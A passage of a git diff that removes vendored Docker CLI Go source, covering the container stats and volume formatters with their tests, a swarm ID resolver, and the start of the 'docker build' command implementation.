--- a/vendor/github.com/docker/docker/cli/command/formatter/stats.go
+++ /dev/null
@@ -1,211 +0,0 @@
-package formatter
-
-import (
-	"fmt"
-	"sync"
-
-	units "github.com/docker/go-units"
-)
-
-const (
-	winOSType                  = "windows"
-	defaultStatsTableFormat    = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.MemPerc}}\t{{.NetIO}}\t{{.BlockIO}}\t{{.PIDs}}"
-	winDefaultStatsTableFormat = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.NetIO}}\t{{.BlockIO}}"
-
-	containerHeader = "CONTAINER"
-	cpuPercHeader   = "CPU %"
-	netIOHeader     = "NET I/O"
-	blockIOHeader   = "BLOCK I/O"
-	memPercHeader   = "MEM %"             // Used only on Linux
-	winMemUseHeader = "PRIV WORKING SET"  // Used only on Windows
-	memUseHeader    = "MEM USAGE / LIMIT" // Used only on Linux
-	pidsHeader      = "PIDS"              // Used only on Linux
-)
-
-// StatsEntry represents represents the statistics data collected from a container
-type StatsEntry struct {
-	Container        string
-	Name             string
-	ID               string
-	CPUPercentage    float64
-	Memory           float64 // On Windows this is the private working set
-	MemoryLimit      float64 // Not used on Windows
-	MemoryPercentage float64 // Not used on Windows
-	NetworkRx        float64
-	NetworkTx        float64
-	BlockRead        float64
-	BlockWrite       float64
-	PidsCurrent      uint64 // Not used on Windows
-	IsInvalid        bool
-	OSType           string
-}
-
-// ContainerStats represents an entity to store containers statistics synchronously
-type ContainerStats struct {
-	mutex sync.Mutex
-	StatsEntry
-	err error
-}
-
-// GetError returns the container statistics error.
-// This is used to determine whether the statistics are valid or not
-func (cs *ContainerStats) GetError() error {
-	cs.mutex.Lock()
-	defer cs.mutex.Unlock()
-	return cs.err
-}
-
-// SetErrorAndReset zeroes all the container statistics and store the error.
-// It is used when receiving time out error during statistics collecting to reduce lock overhead
-func (cs *ContainerStats) SetErrorAndReset(err error) {
-	cs.mutex.Lock()
-	defer cs.mutex.Unlock()
-	cs.CPUPercentage = 0
-	cs.Memory = 0
-	cs.MemoryPercentage = 0
-	cs.MemoryLimit = 0
-	cs.NetworkRx = 0
-	cs.NetworkTx = 0
-	cs.BlockRead = 0
-	cs.BlockWrite = 0
-	cs.PidsCurrent = 0
-	cs.err = err
-	cs.IsInvalid = true
-}
-
-// SetError sets container statistics error
-func (cs *ContainerStats) SetError(err error) {
-	cs.mutex.Lock()
-	defer cs.mutex.Unlock()
-	cs.err = err
-	if err != nil {
-		cs.IsInvalid = true
-	}
-}
-
-// SetStatistics set the container statistics
-func (cs *ContainerStats) SetStatistics(s StatsEntry) {
-	cs.mutex.Lock()
-	defer cs.mutex.Unlock()
-	s.Container = cs.Container
-	s.OSType = cs.OSType
-	cs.StatsEntry = s
-}
-
-// GetStatistics returns container statistics with other meta data such as the container name
-func (cs *ContainerStats) GetStatistics() StatsEntry {
-	cs.mutex.Lock()
-	defer cs.mutex.Unlock()
-	return cs.StatsEntry
-}
-
-// NewStatsFormat returns a format for rendering an CStatsContext
-func NewStatsFormat(source, osType string) Format {
-	if source == TableFormatKey {
-		if osType == winOSType {
-			return Format(winDefaultStatsTableFormat)
-		}
-		return Format(defaultStatsTableFormat)
-	}
-	return Format(source)
-}
-
-// NewContainerStats returns a new ContainerStats entity and sets in it the given name
-func NewContainerStats(container, osType string) *ContainerStats {
-	return &ContainerStats{
-		StatsEntry: StatsEntry{Container: container, OSType: osType},
-	}
-}
-
-// ContainerStatsWrite renders the context for a list of containers statistics
-func ContainerStatsWrite(ctx Context, containerStats []StatsEntry) error {
-	render := func(format func(subContext subContext) error) error {
-		for _, cstats := range containerStats {
-			containerStatsCtx := &containerStatsContext{
-				s: cstats,
-			}
-			if err := format(containerStatsCtx); err != nil {
-				return err
-			}
-		}
-		return nil
-	}
-	return ctx.Write(&containerStatsContext{}, render)
-}
-
-type containerStatsContext struct {
-	HeaderContext
-	s StatsEntry
-}
-
-func (c *containerStatsContext) Container() string {
-	c.AddHeader(containerHeader)
-	return c.s.Container
-}
-
-func (c *containerStatsContext) Name() string {
-	c.AddHeader(nameHeader)
-	name := c.s.Name[1:]
-	return name
-}
-
-func (c *containerStatsContext) ID() string {
-	c.AddHeader(containerIDHeader)
-	return c.s.ID
-}
-
-func (c *containerStatsContext) CPUPerc() string {
-	c.AddHeader(cpuPercHeader)
-	if c.s.IsInvalid {
-		return fmt.Sprintf("--")
-	}
-	return fmt.Sprintf("%.2f%%", c.s.CPUPercentage)
-}
-
-func (c *containerStatsContext) MemUsage() string {
-	header := memUseHeader
-	if c.s.OSType == winOSType {
-		header = winMemUseHeader
-	}
-	c.AddHeader(header)
-	if c.s.IsInvalid {
-		return fmt.Sprintf("-- / --")
-	}
-	if c.s.OSType == winOSType {
-		return fmt.Sprintf("%s", units.BytesSize(c.s.Memory))
-	}
-	return fmt.Sprintf("%s / %s", units.BytesSize(c.s.Memory), units.BytesSize(c.s.MemoryLimit))
-}
-
-func (c *containerStatsContext) MemPerc() string {
-	header := memPercHeader
-	c.AddHeader(header)
-	if c.s.IsInvalid || c.s.OSType == winOSType {
-		return fmt.Sprintf("--")
-	}
-	return fmt.Sprintf("%.2f%%", c.s.MemoryPercentage)
-}
-
-func (c *containerStatsContext) NetIO() string {
-	c.AddHeader(netIOHeader)
-	if c.s.IsInvalid {
-		return fmt.Sprintf("--")
-	}
-	return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.NetworkRx, 3), units.HumanSizeWithPrecision(c.s.NetworkTx, 3))
-}
-
-func (c *containerStatsContext) BlockIO() string {
-	c.AddHeader(blockIOHeader)
-	if c.s.IsInvalid {
-		return fmt.Sprintf("--")
-	}
-	return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.BlockRead, 3), units.HumanSizeWithPrecision(c.s.BlockWrite, 3))
-}
-
-func (c *containerStatsContext) PIDs() string {
-	c.AddHeader(pidsHeader)
-	if c.s.IsInvalid || c.s.OSType == winOSType {
-		return fmt.Sprintf("--")
-	}
-	return fmt.Sprintf("%d", c.s.PidsCurrent)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go b/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go
deleted file mode 100644
index d5a17cc70e..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go
+++ /dev/null
@@ -1,228 +0,0 @@
-package formatter
-
-import (
-	"bytes"
-	"testing"
-
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestContainerStatsContext(t *testing.T) {
-	containerID := stringid.GenerateRandomID()
-
-	var ctx containerStatsContext
-	tt := []struct {
-		stats     StatsEntry
-		expValue  string
-		expHeader string
-		call      func() string
-	}{
-		{StatsEntry{Container: containerID}, containerID, containerHeader, ctx.Container},
-		{StatsEntry{CPUPercentage: 5.5}, "5.50%", cpuPercHeader, ctx.CPUPerc},
-		{StatsEntry{CPUPercentage: 5.5, IsInvalid: true}, "--", cpuPercHeader, ctx.CPUPerc},
-		{StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3}, "0.31 B / 12.3 B", netIOHeader, ctx.NetIO},
-		{StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3, IsInvalid: true}, "--", netIOHeader, ctx.NetIO},
-		{StatsEntry{BlockRead: 0.1, BlockWrite: 2.3}, "0.1 B / 2.3 B", blockIOHeader, ctx.BlockIO},
-		{StatsEntry{BlockRead: 0.1, BlockWrite: 2.3, IsInvalid: true}, "--", blockIOHeader, ctx.BlockIO},
-		{StatsEntry{MemoryPercentage: 10.2}, "10.20%", memPercHeader, ctx.MemPerc},
-		{StatsEntry{MemoryPercentage: 10.2, IsInvalid: true}, "--", memPercHeader, ctx.MemPerc},
-		{StatsEntry{MemoryPercentage: 10.2, OSType: "windows"}, "--", memPercHeader, ctx.MemPerc},
-		{StatsEntry{Memory: 24, MemoryLimit: 30}, "24 B / 30 B", memUseHeader, ctx.MemUsage},
-		{StatsEntry{Memory: 24, MemoryLimit: 30, IsInvalid: true}, "-- / --", memUseHeader, ctx.MemUsage},
-		{StatsEntry{Memory: 24, MemoryLimit: 30, OSType: "windows"}, "24 B", winMemUseHeader, ctx.MemUsage},
-		{StatsEntry{PidsCurrent: 10}, "10", pidsHeader, ctx.PIDs},
-		{StatsEntry{PidsCurrent: 10, IsInvalid: true}, "--", pidsHeader, ctx.PIDs},
-		{StatsEntry{PidsCurrent: 10, OSType: "windows"}, "--", pidsHeader, ctx.PIDs},
-	}
-
-	for _, te := range tt {
-		ctx = containerStatsContext{s: te.stats}
-		if v := te.call(); v != te.expValue {
-			t.Fatalf("Expected %q, got %q", te.expValue, v)
-		}
-
-		h := ctx.FullHeader()
-		if h != te.expHeader {
-			t.Fatalf("Expected %q, got %q", te.expHeader, h)
-		}
-	}
-}
-
-func TestContainerStatsContextWrite(t *testing.T) {
-	tt := []struct {
-		context  Context
-		expected string
-	}{
-		{
-			Context{Format: "{{InvalidFunction}}"},
-			`Template parsing error: template: :1: function "InvalidFunction" not defined
-`,
-		},
-		{
-			Context{Format: "{{nil}}"},
-			`Template parsing error: template: :1:2: executing "" at <nil>: nil is not a command
-`,
-		},
-		{
-			Context{Format: "table {{.MemUsage}}"},
-			`MEM USAGE / LIMIT
-20 B / 20 B
--- / --
-`,
-		},
-		{
-			Context{Format: "{{.Container}}  {{.CPUPerc}}"},
-			`container1  20.00%
-container2  --
-`,
-		},
-	}
-
-	for _, te := range tt {
-		stats := []StatsEntry{
-			{
-				Container:        "container1",
-				CPUPercentage:    20,
-				Memory:           20,
-				MemoryLimit:      20,
-				MemoryPercentage: 20,
-				NetworkRx:        20,
-				NetworkTx:        20,
-				BlockRead:        20,
-				BlockWrite:       20,
-				PidsCurrent:      2,
-				IsInvalid:        false,
-				OSType:           "linux",
-			},
-			{
-				Container:        "container2",
-				CPUPercentage:    30,
-				Memory:           30,
-				MemoryLimit:      30,
-				MemoryPercentage: 30,
-				NetworkRx:        30,
-				NetworkTx:        30,
-				BlockRead:        30,
-				BlockWrite:       30,
-				PidsCurrent:      3,
-				IsInvalid:        true,
-				OSType:           "linux",
-			},
-		}
-		var out bytes.Buffer
-		te.context.Output = &out
-		err := ContainerStatsWrite(te.context, stats)
-		if err != nil {
-			assert.Error(t, err, te.expected)
-		} else {
-			assert.Equal(t, out.String(), te.expected)
-		}
-	}
-}
-
-func TestContainerStatsContextWriteWindows(t *testing.T) {
-	tt := []struct {
-		context  Context
-		expected string
-	}{
-		{
-			Context{Format: "table {{.MemUsage}}"},
-			`PRIV WORKING SET
-20 B
--- / --
-`,
-		},
-		{
-			Context{Format: "{{.Container}}  {{.CPUPerc}}"},
-			`container1  20.00%
-container2  --
-`,
-		},
-		{
-			Context{Format: "{{.Container}}  {{.MemPerc}}  {{.PIDs}}"},
-			`container1  --  --
-container2  --  --
-`,
-		},
-	}
-
-	for _, te := range tt {
-		stats := []StatsEntry{
-			{
-				Container:        "container1",
-				CPUPercentage:    20,
-				Memory:           20,
-				MemoryLimit:      20,
-				MemoryPercentage: 20,
-				NetworkRx:        20,
-				NetworkTx:        20,
-				BlockRead:        20,
-				BlockWrite:       20,
-				PidsCurrent:      2,
-				IsInvalid:        false,
-				OSType:           "windows",
-			},
-			{
-				Container:        "container2",
-				CPUPercentage:    30,
-				Memory:           30,
-				MemoryLimit:      30,
-				MemoryPercentage: 30,
-				NetworkRx:        30,
-				NetworkTx:        30,
-				BlockRead:        30,
-				BlockWrite:       30,
-				PidsCurrent:      3,
-				IsInvalid:        true,
-				OSType:           "windows",
-			},
-		}
-		var out bytes.Buffer
-		te.context.Output = &out
-		err := ContainerStatsWrite(te.context, stats)
-		if err != nil {
-			assert.Error(t, err, te.expected)
-		} else {
-			assert.Equal(t, out.String(), te.expected)
-		}
-	}
-}
-
-func TestContainerStatsContextWriteWithNoStats(t *testing.T) {
-	var out bytes.Buffer
-
-	contexts := []struct {
-		context  Context
-		expected string
-	}{
-		{
-			Context{
-				Format: "{{.Container}}",
-				Output: &out,
-			},
-			"",
-		},
-		{
-			Context{
-				Format: "table {{.Container}}",
-				Output: &out,
-			},
-			"CONTAINER\n",
-		},
-		{
-			Context{
-				Format: "table {{.Container}}\t{{.CPUPerc}}",
-				Output: &out,
-			},
-			"CONTAINER           CPU %\n",
-		},
-	}
-
-	for _, context := range contexts {
-		ContainerStatsWrite(context.context, []StatsEntry{})
-		assert.Equal(t, context.expected, out.String())
-		// Clean buffer
-		out.Reset()
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume.go b/vendor/github.com/docker/docker/cli/command/formatter/volume.go
deleted file mode 100644
index 90c9b13536..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/volume.go
+++ /dev/null
@@ -1,121 +0,0 @@
-package formatter
-
-import (
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/api/types"
-	units "github.com/docker/go-units"
-)
-
-const (
-	defaultVolumeQuietFormat = "{{.Name}}"
-	defaultVolumeTableFormat = "table {{.Driver}}\t{{.Name}}"
-
-	volumeNameHeader = "VOLUME NAME"
-	mountpointHeader = "MOUNTPOINT"
-	linksHeader      = "LINKS"
-	// Status header ?
-)
-
-// NewVolumeFormat returns a format for use with a volume Context
-func NewVolumeFormat(source string, quiet bool) Format {
-	switch source {
-	case TableFormatKey:
-		if quiet {
-			return defaultVolumeQuietFormat
-		}
-		return defaultVolumeTableFormat
-	case RawFormatKey:
-		if quiet {
-			return `name: {{.Name}}`
-		}
-		return `name: {{.Name}}\ndriver: {{.Driver}}\n`
-	}
-	return Format(source)
-}
-
-// VolumeWrite writes formatted volumes using the Context
-func VolumeWrite(ctx Context, volumes []*types.Volume) error {
-	render := func(format func(subContext subContext) error) error {
-		for _, volume := range volumes {
-			if err := format(&volumeContext{v: *volume}); err != nil {
-				return err
-			}
-		}
-		return nil
-	}
-	return ctx.Write(&volumeContext{}, render)
-}
-
-type volumeContext struct {
-	HeaderContext
-	v types.Volume
-}
-
-func (c *volumeContext) MarshalJSON() ([]byte, error) {
-	return marshalJSON(c)
-}
-
-func (c *volumeContext) Name() string {
-	c.AddHeader(volumeNameHeader)
-	return c.v.Name
-}
-
-func (c *volumeContext) Driver() string {
-	c.AddHeader(driverHeader)
-	return c.v.Driver
-}
-
-func (c *volumeContext) Scope() string {
-	c.AddHeader(scopeHeader)
-	return c.v.Scope
-}
-
-func (c *volumeContext) Mountpoint() string {
-	c.AddHeader(mountpointHeader)
-	return c.v.Mountpoint
-}
-
-func (c *volumeContext) Labels() string {
-	c.AddHeader(labelsHeader)
-	if c.v.Labels == nil {
-		return ""
-	}
-
-	var joinLabels []string
-	for k, v := range c.v.Labels {
-		joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v))
-	}
-	return strings.Join(joinLabels, ",")
-}
-
-func (c *volumeContext) Label(name string) string {
-
-	n := strings.Split(name, ".")
-	r := strings.NewReplacer("-", " ", "_", " ")
-	h := r.Replace(n[len(n)-1])
-
-	c.AddHeader(h)
-
-	if c.v.Labels == nil {
-		return ""
-	}
-	return c.v.Labels[name]
-}
-
-func (c *volumeContext) Links() string {
-	c.AddHeader(linksHeader)
-	if c.v.UsageData == nil {
-		return "N/A"
-	}
-	return fmt.Sprintf("%d", c.v.UsageData.RefCount)
-}
-
-func (c *volumeContext) Size() string {
-	c.AddHeader(sizeHeader)
-	if c.v.UsageData == nil {
-		return "N/A"
-	}
-	return units.HumanSize(float64(c.v.UsageData.Size))
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go b/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go
deleted file mode 100644
index 9ec18b6916..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go
+++ /dev/null
@@ -1,189 +0,0 @@
-package formatter
-
-import (
-	"bytes"
-	"encoding/json"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestVolumeContext(t *testing.T) {
-	volumeName := stringid.GenerateRandomID()
-
-	var ctx volumeContext
-	cases := []struct {
-		volumeCtx volumeContext
-		expValue  string
-		expHeader string
-		call      func() string
-	}{
-		{volumeContext{
-			v: types.Volume{Name: volumeName},
-		}, volumeName, volumeNameHeader, ctx.Name},
-		{volumeContext{
-			v: types.Volume{Driver: "driver_name"},
-		}, "driver_name", driverHeader, ctx.Driver},
-		{volumeContext{
-			v: types.Volume{Scope: "local"},
-		}, "local", scopeHeader, ctx.Scope},
-		{volumeContext{
-			v: types.Volume{Mountpoint: "mountpoint"},
-		}, "mountpoint", mountpointHeader, ctx.Mountpoint},
-		{volumeContext{
-			v: types.Volume{},
-		}, "", labelsHeader, ctx.Labels},
-		{volumeContext{
-			v: types.Volume{Labels: map[string]string{"label1": "value1", "label2": "value2"}},
-		}, "label1=value1,label2=value2", labelsHeader, ctx.Labels},
-	}
-
-	for _, c := range cases {
-		ctx = c.volumeCtx
-		v := c.call()
-		if strings.Contains(v, ",") {
-			compareMultipleValues(t, v, c.expValue)
-		} else if v != c.expValue {
-			t.Fatalf("Expected %s, was %s\n", c.expValue, v)
-		}
-
-		h := ctx.FullHeader()
-		if h != c.expHeader {
-			t.Fatalf("Expected %s, was %s\n", c.expHeader, h)
-		}
-	}
-}
-
-func TestVolumeContextWrite(t *testing.T) {
-	cases := []struct {
-		context  Context
-		expected string
-	}{
-
-		// Errors
-		{
-			Context{Format: "{{InvalidFunction}}"},
-			`Template parsing error: template: :1: function "InvalidFunction" not defined
-`,
-		},
-		{
-			Context{Format: "{{nil}}"},
-			`Template parsing error: template: :1:2: executing "" at <nil>: nil is not a command
-`,
-		},
-		// Table format
-		{
-			Context{Format: NewVolumeFormat("table", false)},
-			`DRIVER              VOLUME NAME
-foo                 foobar_baz
-bar                 foobar_bar
-`,
-		},
-		{
-			Context{Format: NewVolumeFormat("table", true)},
-			`foobar_baz
-foobar_bar
-`,
-		},
-		{
-			Context{Format: NewVolumeFormat("table {{.Name}}", false)},
-			`VOLUME NAME
-foobar_baz
-foobar_bar
-`,
-		},
-		{
-			Context{Format: NewVolumeFormat("table {{.Name}}", true)},
-			`VOLUME NAME
-foobar_baz
-foobar_bar
-`,
-		},
-		// Raw Format
-		{
-			Context{Format: NewVolumeFormat("raw", false)},
-			`name: foobar_baz
-driver: foo
-
-name: foobar_bar
-driver: bar
-
-`,
-		},
-		{
-			Context{Format: NewVolumeFormat("raw", true)},
-			`name: foobar_baz
-name: foobar_bar
-`,
-		},
-		// Custom Format
-		{
-			Context{Format: NewVolumeFormat("{{.Name}}", false)},
-			`foobar_baz
-foobar_bar
-`,
-		},
-	}
-
-	for _, testcase := range cases {
-		volumes := []*types.Volume{
-			{Name: "foobar_baz", Driver: "foo"},
-			{Name: "foobar_bar", Driver: "bar"},
-		}
-		out := bytes.NewBufferString("")
-		testcase.context.Output = out
-		err := VolumeWrite(testcase.context, volumes)
-		if err != nil {
-			assert.Error(t, err, testcase.expected)
-		} else {
-			assert.Equal(t, out.String(), testcase.expected)
-		}
-	}
-}
-
-func TestVolumeContextWriteJSON(t *testing.T) {
-	volumes := []*types.Volume{
-		{Driver: "foo", Name: "foobar_baz"},
-		{Driver: "bar", Name: "foobar_bar"},
-	}
-	expectedJSONs := []map[string]interface{}{
-		{"Driver": "foo", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_baz", "Scope": "", "Size": "N/A"},
-		{"Driver": "bar", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_bar", "Scope": "", "Size": "N/A"},
-	}
-	out := bytes.NewBufferString("")
-	err := VolumeWrite(Context{Format: "{{json .}}", Output: out}, volumes)
-	if err != nil {
-		t.Fatal(err)
-	}
-	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
-		t.Logf("Output: line %d: %s", i, line)
-		var m map[string]interface{}
-		if err := json.Unmarshal([]byte(line), &m); err != nil {
-			t.Fatal(err)
-		}
-		assert.DeepEqual(t, m, expectedJSONs[i])
-	}
-}
-
-func TestVolumeContextWriteJSONField(t *testing.T) {
-	volumes := []*types.Volume{
-		{Driver: "foo", Name: "foobar_baz"},
-		{Driver: "bar", Name: "foobar_bar"},
-	}
-	out := bytes.NewBufferString("")
-	err := VolumeWrite(Context{Format: "{{json .Name}}", Output: out}, volumes)
-	if err != nil {
-		t.Fatal(err)
-	}
-	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
-		t.Logf("Output: line %d: %s", i, line)
-		var s string
-		if err := json.Unmarshal([]byte(line), &s); err != nil {
-			t.Fatal(err)
-		}
-		assert.Equal(t, s, volumes[i].Name)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go b/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go
deleted file mode 100644
index 511b1a8f54..0000000000
--- a/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go
+++ /dev/null
@@ -1,90 +0,0 @@
-package idresolver
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/client"
-	"github.com/docker/docker/pkg/stringid"
-)
-
-// IDResolver provides ID to Name resolution.
-type IDResolver struct {
-	client    client.APIClient
-	noResolve bool
-	cache     map[string]string
-}
-
-// New creates a new IDResolver.
-func New(client client.APIClient, noResolve bool) *IDResolver {
-	return &IDResolver{
-		client:    client,
-		noResolve: noResolve,
-		cache:     make(map[string]string),
-	}
-}
-
-func (r *IDResolver) get(ctx context.Context, t interface{}, id string) (string, error) {
-	switch t := t.(type) {
-	case swarm.Node:
-		node, _, err := r.client.NodeInspectWithRaw(ctx, id)
-		if err != nil {
-			return id, nil
-		}
-		if node.Spec.Annotations.Name != "" {
-			return node.Spec.Annotations.Name, nil
-		}
-		if node.Description.Hostname != "" {
-			return node.Description.Hostname, nil
-		}
-		return id, nil
-	case swarm.Service:
-		service, _, err := r.client.ServiceInspectWithRaw(ctx, id)
-		if err != nil {
-			return id, nil
-		}
-		return service.Spec.Annotations.Name, nil
-	case swarm.Task:
-		// If the caller passes the full task there's no need to do a lookup.
-		if t.ID == "" {
-			var err error
-
-			t, _, err = r.client.TaskInspectWithRaw(ctx, id)
-			if err != nil {
-				return id, nil
-			}
-		}
-		taskID := stringid.TruncateID(t.ID)
-		if t.ServiceID == "" {
-			return taskID, nil
-		}
-		service, err := r.Resolve(ctx, swarm.Service{}, t.ServiceID)
-		if err != nil {
-			return "", err
-		}
-		return fmt.Sprintf("%s.%d.%s", service, t.Slot, taskID), nil
-	default:
-		return "", fmt.Errorf("unsupported type")
-	}
-
-}
-
-// Resolve will attempt to resolve an ID to a Name by querying the manager.
-// Results are stored into a cache.
-// If the `-n` flag is used in the command-line, resolution is disabled.
-func (r *IDResolver) Resolve(ctx context.Context, t interface{}, id string) (string, error) {
-	if r.noResolve {
-		return id, nil
-	}
-	if name, ok := r.cache[id]; ok {
-		return name, nil
-	}
-	name, err := r.get(ctx, t, id)
-	if err != nil {
-		return "", err
-	}
-	r.cache[id] = name
-	return name, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/build.go b/vendor/github.com/docker/docker/cli/command/image/build.go
deleted file mode 100644
index 0c88af5fcd..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/build.go
+++ /dev/null
@@ -1,477 +0,0 @@
-package image
-
-import (
-	"archive/tar"
-	"bufio"
-	"bytes"
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-	"regexp"
-	"runtime"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/builder"
-	"github.com/docker/docker/builder/dockerignore"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/fileutils"
-	"github.com/docker/docker/pkg/jsonmessage"
-	"github.com/docker/docker/pkg/progress"
-	"github.com/docker/docker/pkg/streamformatter"
-	"github.com/docker/docker/pkg/urlutil"
-	"github.com/docker/docker/reference"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/docker/go-units"
-	"github.com/spf13/cobra"
-)
-
-type buildOptions struct {
-	context        string
-	dockerfileName string
-	tags           opts.ListOpts
-	labels         opts.ListOpts
-	buildArgs      opts.ListOpts
-	ulimits        *runconfigopts.UlimitOpt
-	memory         string
-	memorySwap     string
-	shmSize        string
-	cpuShares      int64
-	cpuPeriod      int64
-	cpuQuota       int64
-	cpuSetCpus     string
-	cpuSetMems     string
-	cgroupParent   string
-	isolation      string
-	quiet          bool
-	noCache        bool
-	rm             bool
-	forceRm        bool
-	pull           bool
-	cacheFrom      []string
-	compress       bool
-	securityOpt    []string
-	networkMode    string
-	squash         bool
-}
-
-// NewBuildCommand creates a new `docker build` command
-func NewBuildCommand(dockerCli *command.DockerCli) *cobra.Command {
-	ulimits := make(map[string]*units.Ulimit)
-	options := buildOptions{
-		tags:      opts.NewListOpts(validateTag),
-		buildArgs: opts.NewListOpts(runconfigopts.ValidateEnv),
-		ulimits:   runconfigopts.NewUlimitOpt(&ulimits),
-		labels:    opts.NewListOpts(runconfigopts.ValidateEnv),
-	}
-
-	cmd := &cobra.Command{
-		Use:   "build [OPTIONS] PATH | URL | -",
-		Short: "Build an image from a Dockerfile",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			options.context = args[0]
-			return runBuild(dockerCli, options)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.VarP(&options.tags, "tag", "t", "Name and optionally a tag in the 'name:tag' format")
-	flags.Var(&options.buildArgs, "build-arg", "Set build-time variables")
-	flags.Var(options.ulimits, "ulimit", "Ulimit options")
-	flags.StringVarP(&options.dockerfileName, "file", "f", "", "Name of the Dockerfile (Default is 'PATH/Dockerfile')")
-	flags.StringVarP(&options.memory, "memory", "m", "", "Memory limit")
-	flags.StringVar(&options.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap")
-	flags.StringVar(&options.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB")
-	flags.Int64VarP(&options.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)")
-	flags.Int64Var(&options.cpuPeriod, "cpu-period", 0, "Limit the CPU CFS (Completely Fair Scheduler) period")
-	flags.Int64Var(&options.cpuQuota, "cpu-quota", 0, "Limit the CPU CFS (Completely Fair Scheduler) quota")
-	flags.StringVar(&options.cpuSetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)")
-	flags.StringVar(&options.cpuSetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)")
-	flags.StringVar(&options.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container")
-	flags.StringVar(&options.isolation, "isolation", "", "Container isolation technology")
-	flags.Var(&options.labels, "label", "Set metadata for an image")
-	flags.BoolVar(&options.noCache, "no-cache", false, "Do not use cache when building the image")
-	flags.BoolVar(&options.rm, "rm", true, "Remove intermediate containers after a successful build")
-	flags.BoolVar(&options.forceRm, "force-rm", false, "Always remove intermediate containers")
-	flags.BoolVarP(&options.quiet, "quiet", "q", false, "Suppress the build output and print image ID on success")
-	flags.BoolVar(&options.pull, "pull", false, "Always attempt to pull a newer version of the image")
-	flags.StringSliceVar(&options.cacheFrom, "cache-from", []string{}, "Images to consider as cache sources")
-	flags.BoolVar(&options.compress, "compress", false, "Compress the build context using gzip")
-	flags.StringSliceVar(&options.securityOpt, "security-opt", []string{}, "Security options")
-	flags.StringVar(&options.networkMode, "network", "default", "Set the networking mode for the RUN instructions during build")
-
-	command.AddTrustedFlags(flags, true)
-
-	flags.BoolVar(&options.squash, "squash", false, "Squash newly built layers into a single new layer")
-	flags.SetAnnotation("squash", "experimental", nil)
-	flags.SetAnnotation("squash", "version", []string{"1.25"})
-
-	return cmd
-}
-
-// lastProgressOutput is the same as progress.Output except
-// that it only output with the last update. It is used in
-// non terminal scenarios to depresss verbose messages
-type lastProgressOutput struct {
-	output progress.Output
-}
-
-// WriteProgress formats progress information from a ProgressReader.
-func (out *lastProgressOutput) WriteProgress(prog progress.Progress) error {
-	if !prog.LastUpdate {
-		return nil
-	}
-
-	return out.output.WriteProgress(prog)
-}
-
-func runBuild(dockerCli *command.DockerCli, options buildOptions) error {
-
-	var (
-		buildCtx      io.ReadCloser
-		err           error
-		contextDir    string
-		tempDir       string
-		relDockerfile string
-		progBuff      io.Writer
-		buildBuff     io.Writer
-	)
-
-	specifiedContext := options.context
-	progBuff = dockerCli.Out()
-	buildBuff = dockerCli.Out()
-	if options.quiet {
-		progBuff = bytes.NewBuffer(nil)
-		buildBuff = bytes.NewBuffer(nil)
-	}
-
-	switch {
-	case specifiedContext == "-":
-		buildCtx, relDockerfile, err = builder.GetContextFromReader(dockerCli.In(), options.dockerfileName)
-	case urlutil.IsGitURL(specifiedContext):
-		tempDir, relDockerfile, err = builder.GetContextFromGitURL(specifiedContext, options.dockerfileName)
-	case urlutil.IsURL(specifiedContext):
-		buildCtx, relDockerfile, err = builder.GetContextFromURL(progBuff, specifiedContext, options.dockerfileName)
-	default:
-		contextDir, relDockerfile, err = builder.GetContextFromLocalDir(specifiedContext, options.dockerfileName)
-	}
-
-	if err != nil {
-		if options.quiet && urlutil.IsURL(specifiedContext) {
-			fmt.Fprintln(dockerCli.Err(), progBuff)
-		}
-		return fmt.Errorf("unable to prepare context: %s", err)
-	}
-
-	if tempDir != "" {
-		defer os.RemoveAll(tempDir)
-		contextDir = tempDir
-	}
-
